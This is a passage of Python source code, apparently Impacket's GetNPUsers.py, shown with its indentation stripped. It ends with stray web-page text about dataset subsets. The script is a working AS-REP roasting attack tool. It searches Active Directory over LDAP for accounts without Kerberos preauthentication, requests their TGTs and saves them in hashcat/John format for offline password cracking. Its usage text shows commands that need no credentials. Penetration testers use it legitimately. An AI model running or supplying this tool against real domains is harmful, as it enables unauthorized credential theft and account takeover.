(UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)
try:
logging.debug('Search Filter=%s' % searchFilter)
resp = ldapConnection.search(searchFilter=searchFilter,
attributes=['sAMAccountName',
'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
sizeLimit=999)
except ldap.LDAPSearchError as e:
if e.getErrorString().find('sizeLimitExceeded') >= 0:
logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
# We reached the sizeLimit, process the answers we have already and that's it. Until we implement
# paged queries
resp = e.getAnswers()
pass
else:
raise
answers = []
logging.debug('Total of records returned %d' % len(resp))
for item in resp:
if isinstance(item, ldapasn1.SearchResultEntry) is not True:
continue
mustCommit = False
sAMAccountName = ''
memberOf = ''
pwdLastSet = ''
userAccountControl = 0
lastLogon = 'N/A'
try:
for attribute in item['attributes']:
if str(attribute['type']) == 'sAMAccountName':
sAMAccountName = str(attribute['vals'][0])
mustCommit = True
elif str(attribute['type']) == 'userAccountControl':
userAccountControl = "0x%x" % int(attribute['vals'][0])
elif str(attribute['type']) == 'memberOf':
memberOf = str(attribute['vals'][0])
elif str(attribute['type']) == 'pwdLastSet':
if str(attribute['vals'][0]) == '0':
pwdLastSet = '<never>'
else:
pwdLastSet = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
elif str(attribute['type']) == 'lastLogon':
if str(attribute['vals'][0]) == '0':
lastLogon = '<never>'
else:
lastLogon = str(datetime.datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
if mustCommit is True:
answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error('Skipping item, cannot process due to error %s' % str(e))
pass
if len(answers)>0:
self.printTable(answers, header=[ "Name", "MemberOf", "PasswordLastSet", "LastLogon", "UAC"])
print('\n\n')
if self.__requestTGT is True:
usernames = [answer[0] for answer in answers]
self.request_multiple_TGTs(usernames)
else:
print("No entries found!")
def request_users_file_TGTs(self):
with open(self.__usersFile) as fi:
usernames = [line.strip() for line in fi]
self.request_multiple_TGTs(usernames)
def request_multiple_TGTs(self, usernames):
if self.__outputFileName is not None:
fd = open(self.__outputFileName, 'w+')
else:
fd = None
for username in usernames:
try:
entry = self.getTGT(username)
self.outputTGT(entry, fd)
except Exception as e:
logging.error('%s' % str(e))
if fd is not None:
fd.close()
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for users with "
"'Do not require Kerberos preauthentication' set and export their TGTs for cracking")
parser.add_argument('target', action='store', help='domain/username[:password]')
parser.add_argument('-request', action='store_true', default=False, help='Requests TGT for users and output them '
'in JtR/hashcat format (default False)')
parser.add_argument('-outputfile', action='store',
help='Output filename to write ciphers in JtR/hashcat format')
parser.add_argument('-format', choices=['hashcat', 'john'], default='hashcat',
help='format to save the AS_REQ of users without pre-authentication. Default is hashcat')
parser.add_argument('-usersfile', help='File with user per line to test')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials '
'cannot be found, it will use the ones specified in the command '
'line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'ommited it use the domain part (FQDN) '
'specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
print("\nThere are a few modes for using this script")
print("\n1. Get a TGT for a user:")
print("\n\tGetNPUsers.py contoso.com/john.doe -no-pass")
print("\nFor this operation you don\'t need john.doe\'s password. It is important tho, to specify -no-pass in the script, "
"\notherwise a badpwdcount entry will be added to the user")
print("\n2. Get a list of users with UF_DONT_REQUIRE_PREAUTH set")
print("\n\tGetNPUsers.py contoso.com/emily:password or GetNPUsers.py contoso.com/emily")
print("\nThis will list all the users in the contoso.com domain that have UF_DONT_REQUIRE_PREAUTH set. \nHowever "
"it will require you to have emily\'s password. (If you don\'t specify it, it will be asked by the script)")
print("\n3. Request TGTs for all users")
print("\n\tGetNPUsers.py contoso.com/emily:password -request or GetNPUsers.py contoso.com/emily")
print("\n4. Request TGTs for users in a file")
print("\n\tGetNPUsers.py contoso.com/ -no-pass -usersfile users.txt")
print("\nFor this operation you don\'t need credentials.")
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::(.*))?)?').match(options.target).groups('')
if domain == '':
logging.critical('Domain should be specified!')
sys.exit(1)
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
if options.k is False and options.no_pass is True and username == '' and options.usersfile is None:
logging.critical('If the -no-pass option was specified, but Kerberos (-k) is not used, then a username or the -usersfile option should be specified!')
sys.exit(1)
if options.outputfile is not None:
options.request = True
try:
executer = GetUserNoPreAuth(username, password, domain, options)
executer.run()
except Exception as e:
logging.debug("Exception:", exc_info=True)
logging.error(str(e))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.